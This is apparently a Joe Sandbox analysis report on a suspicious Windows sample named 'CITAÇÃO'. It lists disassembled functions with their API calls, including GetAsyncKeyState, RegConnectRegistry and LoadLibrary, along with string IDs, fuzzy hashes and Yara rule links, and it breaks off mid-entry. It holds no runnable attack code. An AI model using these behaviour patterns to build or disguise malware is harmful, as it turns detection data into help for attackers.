                                                      Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                      • _wcslen.LIBCMT ref: 0045F94A
                                                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 621800784-4108050209
                                                      • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                      • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                      • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                      • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                      Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • SetErrorMode.KERNEL32 ref: 004781CE
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                      • SetErrorMode.KERNEL32(?), ref: 00478270
                                                      • SetErrorMode.KERNEL32(?), ref: 00478340
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                      • String ID: \VH
                                                      • API String ID: 3884216118-234962358
                                                      • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                      • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                      • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                      • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                      Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                      • IsMenu.USER32(?), ref: 0044854D
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                      • DrawMenuBar.USER32 ref: 004485AF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert
                                                      • String ID: 0
                                                      • API String ID: 3076010158-4108050209
                                                      • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                      • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                      • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                      • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                      Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                      • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_memmove_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1589278365-1403004172
                                                      • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                      • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                      • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                      • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                      Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Handle
                                                      • String ID: nul
                                                      • API String ID: 2519475695-2873401336
                                                      • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                      • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                      • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                      • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                      Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Handle
                                                      • String ID: nul
                                                      • API String ID: 2519475695-2873401336
                                                      • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                      • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                      • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                      • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                      Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: SysAnimate32
                                                      • API String ID: 0-1011021900
                                                      • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                      • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                      • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                      • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                      Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                      • GetFocus.USER32 ref: 0046157B
                                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                      • __swprintf.LIBCMT ref: 00461608
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                      • String ID: %s%d
                                                      • API String ID: 2645982514-1110647743
                                                      • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                      • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                      • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                      • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                      Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                      • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                      • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                      • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                      Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                      • String ID:
                                                      • API String ID: 3488606520-0
                                                      • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                      • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                      • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                      • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                      Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ConnectRegistry_memmove_wcslen
                                                      • String ID:
                                                      • API String ID: 15295421-0
                                                      • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                      • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                      • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                      • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                      Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Library$FreeLoad
                                                      • String ID:
                                                      • API String ID: 2449869053-0
                                                      • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                      • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                      • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                      • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                      Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 004563A6
                                                      • ScreenToClient.USER32(?,?), ref: 004563C3
                                                      • GetAsyncKeyState.USER32(?), ref: 00456400
                                                      • GetAsyncKeyState.USER32(?), ref: 00456410
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                                      • String ID:
                                                      • API String ID: 3539004672-0
                                                      • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                      • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                      • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                      • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                      Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                      • String ID:
                                                      • API String ID: 327565842-0
                                                      • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                      • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                      • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                      • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                      Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                      Download Yara Rule
